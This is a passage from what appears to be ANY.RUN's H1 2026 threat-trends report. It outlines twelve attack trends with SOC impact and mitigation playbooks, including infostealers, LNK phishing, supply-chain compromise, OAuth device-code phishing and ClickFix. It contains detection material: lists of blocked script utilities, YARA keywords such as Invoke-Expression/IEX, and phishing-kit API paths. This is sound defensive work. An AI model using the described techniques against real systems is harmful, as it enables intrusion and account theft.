<p class="wp-block-paragraph">Instead of collecting passwords, attackers increasingly target session tokens, cookies, recovery paths, crypto-wallet data, and other artifacts that can help them take over accounts or resell access. </p>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Password Reset No Longer Closes the Incident</h4>



<p class="wp-block-paragraph">If attackers retain valid sessions, cookies, or recovery paths, access can continue even after credentials are reset.</p>



<h4 class="wp-block-heading">Identity Compromise Outlives Endpoint Cleanup</h4>



<p class="wp-block-paragraph">The endpoint may appear clean while the user identity remains compromised through an active session.</p>



<h4 class="wp-block-heading">Account Takeover Risk Increases</h4>



<p class="wp-block-paragraph">Delayed detection can enable fast account takeover, continued unauthorized access, and resale of compromised accounts or sessions.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Treat infostealer incidents as large-scale identity compromise rather than merely a credential theft. The response procedures should involve monitoring and correlation of different artifacts.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Implement alerting for anomalous session creation, session token replays, and unusual account recovery flows.</li>



<li>Monitor for specific execution markers characteristic of modern MaaS operations like the use of PowerShell scripting, DLL injections etc.</li>



<li>Analysts must validate the full redirect chain and investigate the origin of any suspicious files, marking &#8220;trust abuse&#8221; as an incident category.</li>
</ul>



<h3 class="wp-block-heading">Stay updated on the latest stealer attacks</h3>



<p class="wp-block-paragraph">Use queries like: </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup#{%22query%22:%22threatName:%5C%22stealer%5C%22%20AND%20submissionCountry:%5C%22US%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">threatName:&#8221;stealer&#8221; AND submissionCountry:&#8221;US&#8221;</a></p>



<p class="wp-block-paragraph">in Threat Intelligence Lookup to uncover threats in your industry and region.</p>



<h2 class="wp-block-heading"><strong>Trend 4: Malicious LNK files remain a common phishing entry point</strong></h2>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="670" height="592" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.54.23.png" alt="" class="wp-image-23370 size-full" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.54.23.png 670w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.54.23-300x265.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.54.23-370x327.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.54.23-270x239.png 270w" sizes="auto, (max-width: 670px) 100vw, 670px" /></figure><div class="wp-block-media-text__content">
<p class="wp-block-paragraph">Attackers increasingly disguise malicious LNK files as legitimate documents. This include contracts, financial reports, and instructions, typically inside archives. When opened, the file launches destructive commands, which were embedded into its metadata.</p>



<p class="wp-block-paragraph">This allows threat actors to execute malicious code in memory in a concealed way, using a decoy.</p>
</div></div>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Trusted Execution Bypasses Standard Controls</h4>



<p class="wp-block-paragraph">Malicious LNK files can bypass standard SEG and EPP controls because execution starts through trusted utilities and is hidden behind what looks like a legitimate document.</p>



<h4 class="wp-block-heading">Investigation and Retrospective Analysis Become Harder</h4>



<p class="wp-block-paragraph">Because the activity is concealed inside a document-like workflow, it becomes harder to detect, investigate, and analyze retrospectively.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Treat LNK files in emails and archives as high-risk objects, never relying on their seemingly legitimate nature.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Prohibit the launch of system utilities such as mshta.exe, powershell.exe, and wscript.exe from untrusted directories using AppLocker or WDAC.</li>



<li>Configure detection rules inside EDR/SIEM to monitor anomalous execution chains, especially with explorer.exe as a parent process.</li>



<li>Check email attachments and downloads using LNK parsers, for example, using YARA rules to check for anomalous long arguments, keywords like bypass, hidden, Invoke-Expression/IEX, and URLs.</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Triage and hunt threats faster with TI Lookup<br>
<span class="highlight">24x more IOCs</span> for faster, more confident decisions
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/threat-intelligence-lookup/?utm_source=h12026_report&#038;utm_medium=report&#038;utm_campaign=h12026_report&#038;utm_term=010926&#038;utm_content=linktolookuplanding#contact-sales" rel="noopener" target="_blank">
Integrate in Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph"><strong>Read more: </strong><a href="https://any.run/cybersecurity-blog/client-side-exploitation/" target="_blank" rel="noreferrer noopener">Client-Side Exploitation: Abusing WebDAV+URL+LNK to Deliver Malicious Payloads</a></p>



<h2 class="wp-block-heading"><strong>Trend 5: Trusted, legitimate platforms as the entryway</strong></h2>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="670" height="592" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.03.13.png" alt="" class="wp-image-23371 size-full" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.03.13.png 670w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.03.13-300x265.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.03.13-370x327.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.03.13-270x239.png 270w" sizes="auto, (max-width: 670px) 100vw, 670px" /></figure><div class="wp-block-media-text__content">
<p class="wp-block-paragraph">ANY.RUN&#8217;s data shows a growth in the popularity of hiding malware delivery infrastructures inside trusted channels. </p>



<p class="wp-block-paragraph">This includes SEO poisoning, malvertising, codesigning, and npm package compromise across common services like Visual Studio Code extensions, WhatsApp, and PDFtools.</p>
</div></div>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Trusted Chains Reduce Suspicion</h4>



<p class="wp-block-paragraph">These attack chains appear normal before execution, making them easy to trust and harder to stop with simple mitigation methods.</p>



<h4 class="wp-block-heading">Investigation Starts Too Late</h4>



<p class="wp-block-paragraph">In many cases, analysis begins only after the payload has been delivered and credential theft has already occurred.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Expand detection beyond file reputation and malware hashes. Treat trust abuse as a separate risk category during detection and triage.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Configure alerts for newly registered domains that utilize legitimate software keywords (e.g., VPN, PDF-tools, or specific corporate utility names) to identify potential SEO poisoning or malvertising sites.</li>



<li>Monitor for unexpected code-signing chains and the installation of IDE or browser extensions from non-standard or newly appeared sources.</li>



<li>In developer and CI/CD environments, implement telemetry to detect drastic changes in package maintainer ownership.</li>
</ul>



<p class="wp-block-paragraph"><strong>Read more:</strong> <a href="https://any.run/cybersecurity-blog/enterprise-phishing-analysis/" target="_blank" rel="noreferrer noopener">Enterprise Phishing via Microsoft &amp; Google Cloud Platforms</a></p>



<h1 class="wp-block-heading"><strong>Trend 6: Cross-platform attacks target Windows, Linux, and macOS</strong></h1>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="670" height="592" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.07.35.png" alt="" class="wp-image-23374 size-full" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.07.35.png 670w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.07.35-300x265.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.07.35-370x327.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.07.35-270x239.png 270w" sizes="auto, (max-width: 670px) 100vw, 670px" /></figure><div class="wp-block-media-text__content">
<p class="wp-block-paragraph">Malicious activity is becoming less tied to a single operating system. Threat actors increasingly use portable payloads and adaptable languages such as Python to target different environments faster, while some malware families are built to support multiple platforms from the start.</p>
</div></div>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Platform-Specific Rules Create False Coverage</h4>



<p class="wp-block-paragraph">Detection rules built for only one platform can make teams overestimate their visibility across the environment.</p>



<h4 class="wp-block-heading">Sandbox Assumptions Break Down</h4>



<p class="wp-block-paragraph">Cross-platform payloads challenge analysis setups that are designed around one operating system or execution path.</p>



<h4 class="wp-block-heading">The Same Campaign Spreads Across Environments</h4>



<p class="wp-block-paragraph">Attackers can move across developer workstations, Linux servers, and other environments without being detected as part of one campaign.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Build a unified correlation model across macOS, Windows, and Linux to ensure cross-platform visibility.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Establish monitoring for shared domains and similar lures (e.g., the same phishing themes or ClickFix prompts) across the entire fleet. Detection logic should hunt for repetitive RMM and remote access tools, archive or installer abuse, and cross-OS exfiltration patterns.</li>



<li>Strengthen control over developer endpoints, Linux servers, and mixed-fleet environments, where the same campaign may leave various artifacts depending on the OS.</li>



<li>If a suspicious DMG is found on macOS, the investigation must immediately check Windows and Linux endpoints for related infrastructure connections or similar file names.</li>
</ul>



<p class="wp-block-paragraph"><strong>Read more:</strong> <a href="https://any.run/cybersecurity-blog/anyrun-macos-sandbox/" target="_blank" rel="noreferrer noopener">Expanding Your SOC’s Cross-Platform Analysis with ANY.RUN&#8217;s Interactive Sandbox</a></p>



<h2 class="wp-block-heading"><strong>Trend 7: Calendar event files are becoming more common in phishing</strong></h2>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="670" height="514" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.09.13.png" alt="" class="wp-image-23375 size-full" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.09.13.png 670w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.09.13-300x230.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.09.13-370x284.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.09.13-270x207.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.09.13-80x60.png 80w" sizes="auto, (max-width: 670px) 100vw, 670px" /></figure><div class="wp-block-media-text__content">
<p class="wp-block-paragraph">According to <a href="https://any.run/?utm_source=h12026_report&amp;utm_medium=report&amp;utm_campaign=h12026_report&amp;utm_term=010926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>’s H1 2026 statistics, .ics and calendar invite attachments are on the rise. Phishing lures, malicious URLs, or QR codes can appear not only in emails, but also inside calendar event files. </p>



<p class="wp-block-paragraph">Although this method is not new, it is becoming more popular as an additional way to interact with the victim. </p>
</div></div>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Calendar Events Add Another Attack Surface</h4>



<p class="wp-block-paragraph">Event files create an additional contact point with the victim and blur the line between email security and calendar-related infrastructure.</p>



<h4 class="wp-block-heading">Related Artifacts May Be Investigated Separately</h4>



<p class="wp-block-paragraph">The email, attachment, and calendar event may be handled as separate objects, even when they belong to the same attack.</p>



<h4 class="wp-block-heading">Visibility Breaks Across the Investigation</h4>



<p class="wp-block-paragraph">When these artifacts are not connected, SOC teams lose continuity during analysis, which can slow down investigation and response.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Expand threat coverage with TI Feeds<br>
<span class="highlight">99% unique IOCs</span> for daily SOC&#038;MSSP workflows
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="hhttps://any.run/threat-intelligence-feeds/?utm_source=h12026_report&#038;utm_medium=report&#038;utm_campaign=h12026_report&#038;utm_term=010926&#038;utm_content=linktotifeedslanding#contact-sales" rel="noopener" target="_blank">
Integrate in Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Treat calendar invites as part of the phishing attack surface, especially when they come from external senders or contain links, QR codes, or unexpected attachments.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Establish detection rules to track .ics files and text/calendar MIME types across all incoming emails, file archives, and web downloads.</li>



<li>Proactively correlate calendar-event artifacts with other common phishing components. This includes identifying links to QR codes, HTML/PDF attachments, and impersonation lures targeting Microsoft, DocuSign, or SharePoin.</li>



<li>Within Microsoft 365 and Google Workspace environments, implement strict governance over external invitations and auto-add functionalities.</li>
</ul>



<h3 class="wp-block-heading">Stay updated on the latest attacks using .ics files</h3>



<p class="wp-block-paragraph">Use the query <a href="https://intelligence.any.run/analysis/lookup#{%22query%22:%22commandLine:%5C%22.ics%5C%22%20and%20threatLevel:%5C%22malicious%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">commandLine:&#8221;.ics&#8221; AND threatLevel:&#8221;malicious&#8221;</a> in Threat Intelligence Lookup to uncover similar threats and related indicators for threat hunting and detection rules.</p>



<h2 class="wp-block-heading"><strong>Trend 8: Supply chain attacks via open-source software are rising</strong></h2>



<p class="wp-block-paragraph">Instead of directly hitting the final victim, threat actors increasingly target software delivery channels like npm packages, PyPI, Crates.io, and CI/CD publications.</p>



<p class="wp-block-paragraph">The methods include malicious package publishing, self-propagating worms, and the compromise of official distributors.</p>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Trust in Official Packages Breaks Down</h4>



<p class="wp-block-paragraph">Compromise at upstream layers undermines trust in official packages and updates, making malicious activity harder for SOC teams to investigate.</p>



<h4 class="wp-block-heading">One Attack Can Reach Many Organizations</h4>



<p class="wp-block-paragraph">This method can affect multiple downstream organizations at the same time, expanding the impact beyond a single compromised environment.</p>



<h4 class="wp-block-heading">Some Campaigns Self-Propagate</h4>



<p class="wp-block-paragraph">Campaigns such as Mini Shai-Hulud do not only infect packages, but can also spread further by abusing victim tokens and pipelines.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Regular download alerts are delivered too late and don’t represent the real impact scope. This is why there’s a need to track more specific incident categories and suspicious indicators.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Actively monitor the publication of new package versions and alert on drastic or rapid changes in maintainer ownership.</li>



<li>Implement automated checks for suspicious preinstall and postinstall hooks within package manifests.</li>



<li>Track anomalies in GitHub Actions and OIDC (OpenID Connect) authentication flows to detect pipeline hijackings. Monitoring should identify mass changes across namespaces.</li>
</ul>



<h3 class="wp-block-heading">Expert-curated reports on emerging attacks for your SOC/MSSP team</h3>



<p class="wp-block-paragraph">View <a href="https://intelligence.any.run/reports" target="_blank" rel="noreferrer noopener">ANY.RUN&#8217;s TI Reports</a> that deliver insights into active malware &amp; phishing campaigns, providing actionable indicators, TTPs, and other detection artifacts for your proactive defense.</p>



<h2 class="wp-block-heading"><strong>Trend 9: Linux privilege escalation is becoming more reliable after compromise</strong></h2>



<p class="wp-block-paragraph">A growing number of reliable Linux local privilege escalation (LPE) exploits are appearing in the wild.</p>



<p class="wp-block-paragraph">They point to a broader shift toward more stable post-compromise root escalation across Linux environments, including major distributions and cloud Linux workloads.</p>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">One Exploit Can Expand Cloud Impact</h4>



<p class="wp-block-paragraph">In cloud- and container-first environments, a successful Linux LPE can give attackers root access on the host, enable container escape, expose secrets, and support lateral movement across clusters or CI/CD environments.</p>



<h4 class="wp-block-heading">Detection Leaves Fewer Artifacts</h4>



<p class="wp-block-paragraph">Linux LPE is harder to fight than regular malware detection because exploitation is local and may leave only minimal artifacts.</p>



<h4 class="wp-block-heading">Public PoCs Accelerate Risk</h4>



<p class="wp-block-paragraph">Public PoCs and writeups can quickly make new kernel flaws widespread, especially when they apply to many modern enterprise distributions.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h3 class="wp-block-heading"><strong>Strategic Focus</strong></h3>



<p class="wp-block-paragraph">Expand Linux security coverage beyond CVE tracking and patch status. Focus on how privilege escalation can increase the impact of an initial compromise across cloud, container, and CI/CD environments.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Pay attention to not only CVEs but also post-exploitation escalation, e.g., the launch of su/sudo right after a suspicious activity, unusual calls to kernel networking/page-cache paths, and drastic changed in privilege boundary at Linux hosts.</li>



<li>During triage, mark kernel LPE, container escape, public PoC, active exploitation, and so on as separate incident categories.</li>



<li>For hardening, defender new quick kernel updates, live patching, minimal local attack surface, and separate rights in container and CI/CD environments.</li>
</ul>



<p class="wp-block-paragraph"><strong>Read more: </strong><a href="https://any.run/cybersecurity-blog/how-to-hunt-and-investigate-linux-malware/" target="_blank" rel="noreferrer noopener">How to Hunt and Investigate Linux Malware</a></p>



<h2 class="wp-block-heading"><strong>Trend 10: OAuth device code compromise is growing in phishing attacks</strong></h2>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="670" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.44.56.png" alt="" class="wp-image-23383 size-full" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.44.56.png 670w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.44.56-300x262.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.44.56-370x324.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.44.56-270x236.png 270w" sizes="auto, (max-width: 670px) 100vw, 670px" /></figure><div class="wp-block-media-text__content">
<p class="wp-block-paragraph">Threat actors are increasingly abusing the legitimate Microsoft OAuth Device Code flow to compromise Microsoft 365 accounts.</p>



<p class="wp-block-paragraph">Instead of regular credential harvesting, they redirect the user from the phishing page to the legitimate Microsoft page, and once their credentials are confirmed, the OAuth tokens are delivered to the attacker.</p>
</div></div>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Legitimate Login Pages Hide the Attack</h4>



<p class="wp-block-paragraph">Users enter credentials on a real Microsoft page, so the usual visual indicators of phishing may be missing or less obvious.</p>



<h4 class="wp-block-heading">Risk Shifts from Password Theft to Token Abuse</h4>



<p class="wp-block-paragraph">Even if the password is not exposed, attackers can still gain access to Microsoft 365 through OAuth tokens.</p>



<h4 class="wp-block-heading">Standard Web Monitoring Sees Less</h4>



<p class="wp-block-paragraph">The activity runs through legitimate authentication flows and HTTPS, making triage harder and requiring more precise signal correlation.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Treat suspicious authentication flows as a compromise signal pay attention to abnormal device-code authentication patterns, even when the user entered credentials on a legitimate Microsoft page.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Monitor anomalous OAuth and device-code authentication events in Microsoft Entra ID and Microsoft 365, including successful device-code authentications for users who do not normally need this flow.</li>



<li>Track follow-up calls to M365 resources after device login, suspicious phishing pages that display verification codes, and HTTP requests to suspicious hosts with paths such as /api/device/start, /api/device/status/, and /api/status/init.</li>



<li>In <a href="https://any.run/?utm_source=h12026_report&amp;utm_medium=report&amp;utm_campaign=h12026_report&amp;utm_term=010926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN&#8217;s Interactive Sandbox</a>, check suspicious URLs and monitor activity tagged as oauth-ms-phish, eviltokens, or kali365.</li>
</ul>



<p class="wp-block-paragraph"><strong>Read more: </strong><a href="https://any.run/cybersecurity-blog/oauth-device-code-phishing/" target="_blank" rel="noreferrer noopener">EvilTokens Phishing as a Service: Attackers Breach M365 Accounts with OAuth Device Codes</a></p>



<h2 class="wp-block-heading"><strong>Trend 11: Attackers are using legitimate RMM tools to breach companies </strong></h2>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="670" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.46.50.png" alt="" class="wp-image-23384 size-full" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.46.50.png 670w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.46.50-300x262.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.46.50-370x324.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.46.50-270x236.png 270w" sizes="auto, (max-width: 670px) 100vw, 670px" /></figure><div class="wp-block-media-text__content">
<p class="wp-block-paragraph">Attackers increasingly use phishing pages not to deliver an obviously malicious payload, but to push the installation of legitimate RMM or remote access tools. </p>



<p class="wp-block-paragraph">The initial access model shifts from malware-first to phishing-first, where the final tool may look trusted in an enterprise environment.</p>
</div></div>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Legitimate Tools Reduce Detection Confidence</h4>



<p class="wp-block-paragraph">RMM phishing is high-risk because attackers abuse tools that may already be allowed or trusted inside the organization.</p>



<h4 class="wp-block-heading">Triage Must Separate Admin Activity from Intrusion</h4>



<p class="wp-block-paragraph">SOC teams need to distinguish legitimate remote administration from unauthorized remote access, which complicates detection, triage, and response.</p>



<h4 class="wp-block-heading">Trusted Context Extends Dwell Time</h4>



<p class="wp-block-paragraph">When malicious intent is harder to prove, attacks may stay unnoticed longer and give attackers extended access to the infrastructure.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Treat unexpected RMM activity as a context-driven access risk, not as automatically benign software.</p>



<p class="wp-block-paragraph">Legitimate or signed RMM tools should still be validated against the delivery path, approved admin workflows, and expected usage.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Maintain a strict, centralized allowlist of approved RMM tools, including specific authorized tenants, accounts, admin hosts, and sanctioned workflow.</li>



<li>Security systems must be configured to track the full attack chain: from the initial visit to a phishing page to the subsequent installer or script download, culminating in RMM execution and outbound connections to remote infrastructure.</li>



<li>During incident triage, analysts must verify the download source and parent process; RMM tools launched from user directories (e.g., %TEMP%, Downloads, AppData).</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Stay updated on latest threats with <span class="highlight">TI Reports</span><br>
Turn latest research into proactive security
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://intelligence.any.run/reports/?utm_source=h12026_report&amp;utm_medium=report&amp;utm_campaign=h12026_report&amp;utm_term=010926&amp;utm_content=linktotireports" rel="noopener" target="_blank">
Enrich investigations</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph"><strong>Read more: </strong><a href="https://any.run/cybersecurity-blog/rmm-blind-spot-for-cisos/" target="_blank" rel="noreferrer noopener">Phishing-to-RMM Attacks: The Remote Access Blind Spot CISOs Can’t Ignore</a></p>



<h2 class="wp-block-heading"><strong>Trend 12: Legitimate website abuse is growing in ClickFix campaigns</strong></h2>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="670" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.48.39.png" alt="" class="wp-image-23385 size-full" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.48.39.png 670w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.48.39-300x262.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.48.39-370x324.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.48.39-270x236.png 270w" sizes="auto, (max-width: 670px) 100vw, 670px" /></figure><div class="wp-block-media-text__content">
<p class="wp-block-paragraph">Instead of creating dedicated phishing domains, threat actors increasingly spread ClickFix campaigns through compromised legitimate websites.</p>



<p class="wp-block-paragraph">They inject code into real websites to display fake messages that urge users to run malicious commands in PowerShell or CMD.</p>
</div></div>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Clean Domains Pass Reputation Checks</h4>



<p class="wp-block-paragraph">Attackers abuse legitimate websites with clean history, so the domains may not be identified as suspicious during early detection.</p>



<h4 class="wp-block-heading">Standard Detection Coverage Misses the Setup</h4>



<p class="wp-block-paragraph">Many security tools focus on newly registered domains or known phishing pages, while ClickFix can start from a trusted website.</p>



<h4 class="wp-block-heading">Manual Execution Hides the Malicious Step</h4>



<p class="wp-block-paragraph">The malicious logic may be hidden in injected JavaScript, while the user is pushed to run the command manually. This makes detection and triage harder and requires deeper browser and webpage analysis.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Don’t consider domain reputation as sufficient proof of safety. Legitimate and long-standing websites can still become the first stage of an attack, so SOC teams should assess the full user interaction flow, not only the domain or URL.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>During triage, analysts must perform a <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">deep-dive into webpage content and JavaScript</a>, rather than focusing solely on the domain or URL.</li>



